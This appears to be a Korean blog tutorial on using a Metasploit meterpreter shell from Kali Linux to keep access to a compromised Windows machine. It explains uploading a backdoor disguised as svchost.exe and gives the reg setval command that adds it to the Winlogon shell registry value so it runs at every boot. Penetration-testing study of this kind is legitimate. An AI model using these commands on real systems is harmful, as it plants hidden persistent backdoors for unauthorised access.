칼리리눅스로 희생자 시스템의 미터프리터 쉘(meterpreter shell)을 획득했다면 해당 쉘에서 시스템 권한 상승, 키로깅, 스냅샷, 레지스트리, 프로세스 등 다양한 공격 명령어를 지원한다.


공격 명령어 중 레지스트리를 조작할 수 있는 기능을 지원하는데, 이는 희생자가 재부팅을 하면 세션이 끊어지므로 자동 레지스트리에 백도어를 등록하면 세션이 계속 유지된다. 


칼리리눅스(Kali Linux) 레지스트리 조작

공격자가 희생자 시스템에 침투 성공 후 추후 희생자 시스템에 침투하려고 특정 위치에 백도어(svchost.exe)를 업로드한다. 또한, 희생자가 재부팅 시 자동으로 공격자와 연결이 맺어지도록 시작 레지스트리에 백도어를 등록한다.


미터프리터 쉘에서 레지스트리를 변조했으면 희생자 시스템으로 이동하여 레지스트리 편집기 창을 실행한다. 시작 레지스트리 경로로 이동하면 svchost.exe가 등록되어 있다.


칼리리눅스 자동 실행 레지스트리


⊙ reg enumkey

 ○ 레지스트리 키 열거

 ○ reg enumkey -k "HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon"

 ○ -k : 레지스트리 경로


⊙ reg queryval

 ○ 레지스트리 키 질의

 ○ reg queryval -k "HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon" -v shell

 ○ -k : 레지스트리 경로

 ○ -v : 레지스트리 값 이름


⊙ reg setval

 ○ 레지스트리 값 추가/수정

 ○ reg setval -k "HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon" -v shell -d "explorer.exe C:\\Windows\svchost.exe"


▶ 윈도우 시작 레지스트리 (자동실행 조작)

▶ Windows 화면보호기 레지스트리

▶ 칼리리눅스 초기설정

▶ 칼리리눅스 업그레이드

▶ 모의해킹이란

▶ XSSF(Cross Site Scripting Framework) 사용법

▶ Metasploit meterpreter 기능 및 사용법

  • 카카오톡-공유
  • 네이버-블로그-공유
  • 네이버-밴드-공유
  • 페이스북-공유
  • 트위터-공유
  • 카카오스토리-공유